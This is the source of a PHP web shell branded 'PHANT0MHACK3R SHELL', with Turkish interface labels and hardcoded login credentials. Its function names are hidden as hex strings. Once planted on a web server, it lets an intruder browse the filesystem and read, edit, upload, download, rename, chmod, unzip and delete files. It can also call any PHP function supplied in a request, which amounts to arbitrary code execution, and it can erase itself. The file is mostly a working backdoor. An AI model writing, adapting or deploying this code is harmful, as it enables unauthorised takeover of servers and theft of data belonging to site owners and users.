# Konfigurasyon

$sayfaSifreleme = '1'; # 1 acik , 0 kapali

$kullaniciAdi = 'admin';

$sifre = 'phant0mhack3r';



# yetki kontrol fonksiyonu

function yetkiKontrol($kullaniciAdi, $sifre)
{

if (empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {

header('WWW-Authenticate: Basic realm="x"');

die(header('HTTP/1.0 401 Unauthorized'));

}

}



# Sayfa Sifreleme aciksa

if ($sayfaSifreleme == '1') {

# Veri ve sifre kontrolu

yetkiKontrol($kullaniciAdi, $sifre);

}







header("X-XSS-Protection: 0");
ob_start();
set_time_limit(0);
error_reporting(0);
ini_set('display_errors', FALSE);

$Array = [

'7068705f756e616d65',

'70687076657273696f6e',

'6368646972',

'676574637764',

'707265675f73706c6974',

'636f7079',

'66696c655f6765745f636f6e74656e7473',

'6261736536345f6465636f6465',

'69735f646972',

'6f625f656e645f636c65616e28293b',

'756e6c696e6b',

'6d6b646972',

'63686d6f64',

'7363616e646972',

'7374725f7265706c616365',

'68746d6c7370656369616c6368617273',

'7661725f64756d70',

'666f70656e',

'667772697465',

'66636c6f7365',

'64617465',

'66696c656d74696d65',

'737562737472',

'737072696e7466',

'66696c657065726d73',

'746f756368',

'66696c655f657869737473',

'72656e616d65',

'69735f6172726179',

'69735f6f626a656374',

'737472706f73',

'69735f7772697461626c65',

'69735f7265616461626c65',

'737472746f74696d65',

'66696c6573697a65',

'726d646972',

'6f625f6765745f636c65616e',

'7265616466696c65',

'617373657274',

];

$___ = count($Array);

for ($i = 0; $i < $___; $i++) {

$GNJ[] = uhex($Array[$i]);

}



<!DOCTYPE html>

<html dir="auto" lang="en-US">





<meta charset="UTF-8">

<meta name="robots" content="NOINDEX, NOFOLLOW">



PHANT0MHACK3R <title>PHANT0MHACK3R</title>



<link rel="icon" href="https://c.top4top.io/p_2496i85ap1.png" />





<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>



<style type="text/css">
@charset "UTF-8";
@import url(https://cdn.anarchyKayze.wiki/noselect.css);
@import url(https://use.fontawesome.com/releases/v5.8.1/css/all.css);

@font-face {
font-family: i;
src: url(i.woff2) format('woff2'), url(i.woff) format('woff')
}

html {
margin-left: 1em;
margin-right: 1em;
margin-top: -1.5em;
background: #000 !important;
font-family: Courier;
}

.x {
text-align: center
}

.y {
font-family: i;
font-size: calc(2.3em + 2.3vw);
color: #48ff00
}

.y:hover {
color: #48ff00
}

.w {
color: #48ff00
}

.b {
color: #48ff00
}

.q {
margin-top: .5em
}

article {
margin-top: 1.5em;
font-size: .9em
}

.i {
float: left
}

.u {
float: right;
text-align: right;
margin-bottom: 1.5em
}

input[type=file] {
display: none
}

input[type=submit] {
border: 1px solid #48ff00;
padding: .2em;
background: #000
}

td {
color: #48ff00
}

th {
font-weight: 400;
border-bottom: thin solid #48ff00;
color: #48ff00
}

.et {
text-align: left;
color: #48ff00
}

.r:hover {
background: #0 0
}

.l {
border: 1px solid #48ff00;
padding: 1px;
background: 0 0
}

footer {
margin-top: 2em;
height: 2.2rem;
width: 100%;
font-size: .9em
}

footer:hover {
color: #48ff00
}

a {
text-decoration: none;
color: #ff0000
}

a:hover {
color: #48ff00
}

.m {
margin-left: 2.4em
}

textarea {
background: #48ff00 0;
border: none;
width: 70%;
height: 30em;
font-family: Courier;
font-size: .9em
}

textarea.o {
background: #48ff00
}

.h {
color: #48ff00
}
</style>



<header>

<div class="y x">

<a class="ajx" href=" echo basename($_SERVER['PHP_SELF']); ">

PHANT0MHACK3R SHELL

</a>

</div>







</header>



<article>

<div class="i">

<i class="far fa-hdd"></i>

echo $GNJ[0]();



<br />



<i class="far fa-lightbulb"></i> &thinsp;&thinsp;SOFT :
echo $_SERVER['SERVER_SOFTWARE']; PHP :
echo $GNJ[1]();



<br />



<i class="far fa-folder"></i>





if (isset($_GET["d"])) {

$d = uhex($_GET["d"]);

$GNJ[2](uhex($_GET["d"]));

} else {

$d = $GNJ[3]();

}

$k = $GNJ[4]("/(\\\|\/)/", $d);

foreach ($k as $m => $l) {

if ($l == '' && $m == 0) {

echo '<a class="ajx" href="?d=2f">/</a>';

}

if ($l == '') {

continue;

}

echo '<a class="ajx" href="?d=';

for ($i = 0; $i <= $m; $i++) {

echo hex($k[$i]);

if ($i != $m) {

echo '2f';

}

}

echo '">' . $l . '</a>/';

}





<br />



</div>



<div class="u">

echo $_SERVER['SERVER_ADDR']; <i class="fas fa-link"></i>

<br />



<br />





<label class="l w">

&nbsp;Yüklemek

</label>&nbsp;







$o_ = [

'<script>$.notify("',

'", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'

];

$f = $o_[0] . 'OK!' . $o_[1];

$g = $o_[0] . 'ER!' . $o_[1];

if (isset($_FILES["n"])) {

$z = $_FILES["n"]["name"];

$r = count($z);

for ($i = 0; $i < $r; $i++) {

if ($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {

echo $f;

} else {

echo $g;

}

}

}





</div>



$a_ = '<table cellspacing="0" cellpadding="7" width="100%">

<thead>



<th>';

$b_ = '</th>



</thead>

<tbody>









<td class="x">';

$c_ = '



</tbody>

';

$d_ = '<br />

<br />



';

if (isset($_GET["s"])) {

echo $a_ . uhex($_GET["s"]) . $b_ . '

<textarea readonly="yes">' . $GNJ[15]($GNJ[6](uhex($_GET["s"]))) . '</textarea>

<br />

<br />



' . $c_;

} elseif (isset($_GET["y"])) {

echo $a_ . 'REQUEST' . $b_ . '



&nbsp;&nbsp;



' . $d_ . '

<br />

<textarea readonly="yes">';



if (isset($_POST["2"])) {

echo $GNJ[15](dre($_POST["1"], $_POST["2"]));

}



echo '</textarea>

' . $c_;

} elseif (isset($_GET["e"])) {

echo $a_ . uhex($_GET["e"]) . $b_ . '



<textarea name="e" class="o">' . $GNJ[15]($GNJ[6](uhex($_GET["e"]))) . '</textarea>

<br />

<br />

<span class="w"></span>





</select>

' . $d_ . '

' . $c_ . '



<script>

$("#b64").change(function() {

if($("#b64 option:selected").val() == 0) {

var X = $("textarea").val();

var Z = atob(X);

$("textarea").val(Z);

}

else {

var N = $("textarea").val();

var I = btoa(N);

$("textarea").val(I);

}

});

</script>';

if (isset($_POST["e"])) {

if ($_POST["b64"] == "1") {

$ex = $GNJ[7]($_POST["e"]);

} else {

$ex = $_POST["e"];

}

$fp = $GNJ[17](uhex($_GET["e"]), 'w');

if ($GNJ[18]($fp, $ex)) {

OK();

} else {

ER();

}

$GNJ[19]($fp);

}

} elseif (isset($_GET["x"])) {

rec(uhex($_GET["x"]));

if ($GNJ[26](uhex($_GET["x"]))) {

ER();

} else {

OK();

}



} elseif (isset($_GET["t"])) {

echo $a_ . uhex($_GET["t"]) . $b_ . '





' . $d_ . '

' . $c_;

if (!empty($_POST["t"])) {

$p = $GNJ[33]($_POST["t"]);

if ($p) {

if (!$GNJ[25](uhex($_GET["t"]), $p, $p)) {

ER();

} else {

OK();

}

} else {

ER();

}

}

} elseif (isset($_GET["k"])) {

echo $a_ . uhex($_GET["k"]) . $b_ . '





' . $d_ . '

' . $c_;

if (!empty($_POST["b"])) {

$x = $_POST["b"];

$t = 0;

for ($i = strlen($x) - 1; $i >= 0; --$i)

$t += (int) $x[$i] * pow(8, (strlen($x) - $i - 1));

if (!$GNJ[12](uhex($_GET["k"]), $t)) {

ER();

} else {

OK();

}

}

} elseif (isset($_GET["l"])) {

echo $a_ . '+DIR' . $b_ . '





' . $d_ . '

' . $c_;

if (isset($_POST["l"])) {

if (!$GNJ[11]($_POST["l"])) {

ER();

} else {

OK();

}

}

} elseif (isset($_GET["q"])) {

if ($GNJ[10](__FILE__)) {

$GNJ[38]($GNJ[9]);

header("Location: " . basename($_SERVER['PHP_SELF']) . "");

exit();

} else {

echo $g;

}

} elseif (isset($_GET["n"])) {

echo $a_ . '+FILE' . $b_ . '





' . $d_ . '

' . $c_;

if (isset($_POST["n"])) {

if (!$GNJ[25]($_POST["n"])) {

ER();

} else {

OK();

}

}

} elseif (isset($_GET["r"])) {

echo $a_ . uhex($_GET["r"]) . $b_ . '





' . $d_ . '

' . $c_;

if (isset($_POST["r"])) {

if ($GNJ[26]($_POST["r"])) {

ER();

} else {

if ($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {

OK();

} else {

ER();

}

}

}

} elseif (isset($_GET["z"])) {

$zip = new ZipArchive;

$res = $zip->open(uhex($_GET["z"]));

if ($res === TRUE) {

$zip->extractTo(uhex($_GET["d"]));

$zip->close();

OK();

} else {

ER();

}

} else {

echo '<table cellspacing="0" cellpadding="7" width="100%">

<thead>



<th width="44%">[ ISIM ]</th>

<th width="11%">[ BOYUT ]</th>

<th width="17%">[ PERM ]</th>

<th width="17%">[ TARİH ]</th>

<th width="11%">[ ACT ]</th>



</thead>

<tbody>





<a class="ajx" href="?d=' . hex($d) . '&n">+DOSYA</a>

<a class="ajx" href="?d=' . hex($d) . '&l">+DIR</a>





';



$h = "";

$j = "";

$w = $GNJ[13]($d);

if ($GNJ[28]($w) || $GNJ[29]($w)) {

foreach ($w as $c) {

$e = $GNJ[14]("\\", "/", $d);

if (!$GNJ[30]($c, ".zip")) {

$zi = '';

} else {

$zi = '<a href="?d=' . hex($e) . '&z=' . hex($c) . '">U</a>';

}

if ($GNJ[31]("$d/$c")) {

$o = "";

} elseif (!$GNJ[32]("$d/$c")) {

$o = " h";

} else {

$o = " w";

}

$s = $GNJ[34]("$d/$c") / 1024;

$s = round($s, 3);

if ($s >= 1024) {

$s = round($s / 1024, 2) . " MB";

} else {

$s = $s . " KB";

}

if (($c != ".") && ($c != "..")) {

($GNJ[8]("$d/$c")) ?

$h .= '<tr class="r">



<i class="far fa-folder m"></i>

<a class="ajx" href="?d=' . hex($e) . hex("/" . $c) . '">' . $c . '</a>



<td class="x">

dir



<td class="x">

<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("$d/$c") . '</a>



<td class="x">

<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")) . '</a>



<td class="x">

<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">R</a>

<a href="?d=' . hex($e) . '&x=' . hex($c) . '">D</a>







'

:

$j .= '<tr class="r">



<i class="far fa-file m"></i>&thinsp;

<a class="ajx" href="?d=' . hex($e) . '&s=' . hex($c) . '">' . $c . '</a>



<td class="x">

' . $s . '



<td class="x">

<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("$d/$c") . '</a>



<td class="x">

<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")) . '</a>



<td class="x">

<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">R</a>

<a class="ajx" href="?d=' . hex($e) . '&e=' . hex($c) . '">E</a>

<a href="?d=' . hex($e) . '&g=' . hex($c) . '">G</a>

' . $zi . '

<a href="?d=' . hex($e) . '&x=' . hex($c) . '">D</a>







';



}

}

}



echo $h;

echo $j;

echo '</tbody>

<tfoot>



<th class="et">

<a class="ajx" href="?d=' . hex($e) . '&y">SORGU</a>

<a href="?d=' . hex($e) . '&q">ÇIKIŞ(SHELL SİL)</a>

</th>

<th class="et" width="11%"></th>

<th class="et" width="17%"></th>

<th class="et" width="17%"></th>

<th class="et" width="11%"></th>



</tfoot>

';

}







</article>

<footer class="x">

<a href="https://github.com/Phant0mHack3r">&copy;Coder PHANT0MHACK3R</a>

</footer>





if (isset($_GET["1"])) {

echo $f;

} elseif (isset($_GET["0"])) {

echo $g;

} else {

NULL;

}





<script>

$(".ajx").click(function (t) { t.preventDefault(); var e = $(this).attr("href"); history.pushState("", "", e), $.get(e, function (t) { $("body").html(t) }) });

</script>







function rec($j)
{

global $GNJ;

if (trim(pathinfo($j, PATHINFO_BASENAME), '.') === '') {

return;

}

if ($GNJ[8]($j)) {

array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));

$GNJ[35]($j);

} else {

$GNJ[10]($j);

}

}

function dre($y1, $y2)
{

global $GNJ;

ob_start();

$GNJ[16]($y1($y2));

return $GNJ[36]();

}

function hex($n)
{

$y = '';

for ($i = 0; $i < strlen($n); $i++) {

$y .= dechex(ord($n[$i]));

}

return $y;

}

function uhex($y)
{

$n = '';

for ($i = 0; $i < strlen($y) - 1; $i += 2) {

$n .= chr(hexdec($y[$i] . $y[$i + 1]));

}

return $n;

}

function OK()
{

global $GNJ, $d;

$GNJ[38]($GNJ[9]);

header("Location: ?d=" . hex($d) . "&1");

exit();

}

function ER()
{

global $GNJ, $d;

$GNJ[38]($GNJ[9]);

header("Location: ?d=" . hex($d) . "&0");

exit();

}

function x($c)
{

global $GNJ;

$x = $GNJ[24]($c);

if (($x & 0xC000) == 0xC000) {

$u = "s";

} elseif (($x & 0xA000) == 0xA000) {

$u = "l";

} elseif (($x & 0x8000) == 0x8000) {

$u = "-";

} elseif (($x & 0x6000) == 0x6000) {

$u = "b";

} elseif (($x & 0x4000) == 0x4000) {

$u = "d";

} elseif (($x & 0x2000) == 0x2000) {

$u = "c";

} elseif (($x & 0x1000) == 0x1000) {

$u = "p";

} else {

$u = "u";

}

$u .= (($x & 0x0100) ? "r" : "-");

$u .= (($x & 0x0080) ? "w" : "-");

$u .= (($x & 0x0040) ? (($x & 0x0800) ? "s" : "x") : (($x & 0x0800) ? "S" : "-"));

$u .= (($x & 0x0020) ? "r" : "-");

$u .= (($x & 0x0010) ? "w" : "-");

$u .= (($x & 0x0008) ? (($x & 0x0400) ? "s" : "x") : (($x & 0x0400) ? "S" : "-"));

$u .= (($x & 0x0004) ? "r" : "-");

$u .= (($x & 0x0002) ? "w" : "-");

$u .= (($x & 0x0001) ? (($x & 0x0200) ? "t" : "x") : (($x & 0x0200) ? "T" : "-"));

return $u;

}

if (isset($_GET["g"])) {

$GNJ[38]($GNJ[9]);

header("Content-Type: application/octet-stream");

header("Content-Transfer-Encoding: Binary");

header("Content-Length: " . $GNJ[34](uhex($_GET["g"])));

header("Content-disposition: attachment; filename=\"" . uhex($_GET["g"]) . "\"");

$GNJ[37](uhex($_GET["g"]));

}